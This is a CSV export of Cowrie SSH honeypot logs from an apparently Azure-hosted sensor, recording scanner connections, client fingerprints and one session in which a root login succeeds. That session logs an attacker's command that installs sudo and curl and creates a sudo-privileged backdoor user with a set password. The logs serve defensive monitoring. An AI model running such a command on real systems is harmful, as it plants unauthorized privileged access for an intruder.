+"9/20/2024, 6:11:15.494 
AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519-cert-v01@openssh.com"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:15.492686Z"",""src_ip"":""192.155.90.118"",""session"":""37d8a9aeed34""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:15.915 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.9154794216156006,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:15.914357Z"",""src_ip"":""192.155.90.118"",""session"":""37d8a9aeed34""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:27:00.048 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":4.187134504318237,""message"":""Connection lost after 4 
seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:27:00.047803Z"",""src_ip"":""198.235.24.158"",""session"":""79e745d1bcb3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:53:24.231 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""198.235.24.222"",""src_port"":63840,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""5d352370cf62"",""protocol"":""ssh"",""message"":""New connection: 198.235.24.222:63840 (10.0.0.4:2222) [session: 5d352370cf62]"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:53:24.229773Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:53:24.816 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:53:24.815933Z"",""src_ip"":""198.235.24.222"",""session"":""5d352370cf62""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:53:25.729 
AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hma
c-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:53:25.726380Z"",""src_ip"":""198.235.24.222"",""session"":""5d352370cf62""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:53:27.333 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.1007533073425293,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:53:27.332365Z"",""src_ip"":""198.235.24.222"",""session"":""5d352370cf62""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.311 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""172.104.11.4"",""src_port"":23880,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""9cb4a477537d"",""protocol"":""ssh"",""message"":""New connection: 172.104.11.4:23880 (10.0.0.4:2222) [session: 9cb4a477537d]"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.310437Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.324 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: 
SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.323528Z"",""src_ip"":""172.104.11.4"",""session"":""9cb4a477537d""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.330 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.324515Z"",""src_ip"":""172.104.11.4"",""session"":""9cb4a477537d""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.349 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.03668951988220215,""message"":""Connection lost after 0 
seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.348463Z"",""src_ip"":""172.104.11.4"",""session"":""9cb4a477537d""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.358 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""172.104.11.4"",""src_port"":23890,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""e3b2c81ed31f"",""protocol"":""ssh"",""message"":""New connection: 172.104.11.4:23890 (10.0.0.4:2222) [session: e3b2c81ed31f]"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.357526Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.359 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.359139Z"",""src_ip"":""172.104.11.4"",""session"":""e3b2c81ed31f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.403 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.374388Z"",""src_ip"":""172.104.11.4"",""session"":""e3b2c81ed31f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.403 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.030223369598388672,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.389039Z"",""src_ip"":""172.104.11.4"",""session"":""e3b2c81ed31f""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.403 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""172.104.11.4"",""src_port"":23894,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""fa6c8e879b78"",""protocol"":""ssh"",""message"":""New connection: 172.104.11.4:23894 (10.0.0.4:2222) [session: fa6c8e879b78]"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.398466Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.422 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.421463Z"",""src_ip"":""172.104.11.4"",""session"":""fa6c8e879b78""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.426 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519-cert-v01@openssh.com"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.422655Z"",""src_ip"":""172.104.11.4"",""session"":""fa6c8e879b78""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.477 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.07714271545410156,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.476428Z"",""src_ip"":""172.104.11.4"",""session"":""fa6c8e879b78""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:48.043 
PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":50306,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1f2ab4c830c8"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:50306 (10.0.0.4:2222) [session: 1f2ab4c830c8]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:48.042399Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:48.445 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:48.443807Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:48.448 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:48.445709Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:50.296 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] 
succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:50.295510Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.077 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.075444Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.078 PM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 mSmKGGfS) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 mSmKGGfS) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.077248Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.079 PM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 mSmKGGfS"",""message"":""CMD: openssl passwd -1 mSmKGGfS"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.078791Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.080 
PM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 mSmKGGfS"",""message"":""Command not found: openssl passwd -1 mSmKGGfS"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.080135Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.083 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.082468Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.084 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.083913Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.659 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/c4d3f1747467e8af6a94542f8ce85817e0f5b2dfd114e4961a38a163ef8dc721"",""size"":725,""shasum"":""c4d3f1747467e8af6a94542f8ce85817e0f5b2dfd114e4961a38a163ef8dc721"",""duplicate"":false,""duration"":0.5830068588256836,""message"":""Closing TTY Log: var/lib/cowrie/tty/c4d3f1747467e8af6a94542f8ce85817e0f5b2dfd114e4961a38a163ef8dc721 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.658009Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.660 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.616314649581909,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.660051Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:57:28.259 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""64.62.197.137"",""src_port"":14425,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""8816a9320164"",""protocol"":""ssh"",""message"":""New connection: 64.62.197.137:14425 (10.0.0.4:2222) [session: 8816a9320164]"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:57:28.258888Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:57:28.264 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:57:28.261321Z"",""src_ip"":""64.62.197.137"",""session"":""8816a9320164""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:57:28.339 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""7216c7c473918b4f83d1139b3c70dbf9"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecds